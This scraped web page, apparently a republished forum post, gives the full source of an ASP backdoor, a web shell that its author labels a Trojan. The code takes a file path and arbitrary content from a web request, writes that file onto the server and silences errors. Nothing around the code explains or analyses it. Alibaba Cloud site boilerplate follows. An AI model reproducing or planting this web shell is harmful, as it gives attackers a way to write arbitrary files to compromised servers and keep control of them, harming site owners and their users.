Seven Step inverted ┈→ special ASP Backdoor _ Trojan Related

Source: Internet
Author: User
Tags save file
<title> Seven step down ┈→ dedicated ASP backdoor </title>
<%dim objfso%>
<%dim fdata%>
<%dim objcountfile%>
<%on Error Resume Next%>
<%set objFSO = Server.CreateObject ("Scripting.FileSystemObject")%>
<%if Trim (Request ("Syfdpath")) <> "" Then%>
<%fdata = Request ("Cyfddata")%>
<%set Objcountfile=objfso.createtextfile (Request ("Syfdpath"), True)%>
<%objcountfile.write fdata%>
<%if Err =0 then%>
<%response.write "<font color=blue>save success!</font>"%>
<%else%>
<%response.write "<font color=red>save unsuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%set objcountfile=nothing%>
<%set objFSO = nothing%>
<%response.write "<form action=" "Method=post>"%>
<%response.write "<font color=blue>save file absolute path:</font>"%>
<%response.write "<input type=text name=syfdpath width=32 size=50>"%>
<%response.write "<br>"%>
<%response.write "<font color=red>file of Absolute path"%>
<%=server.mappath (Request.ServerVariables ("Script_name"))%>
<%response.write "<br>"%>
<%response.write "Input:"%>
<%response.write "<textarea name=cyfddata cols=80 rows=10
Width=50></textarea> "%>
<%response.write "<input type=submit value=save>"%>
<%response.write "</form>"%>
By: Seven Steps down
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.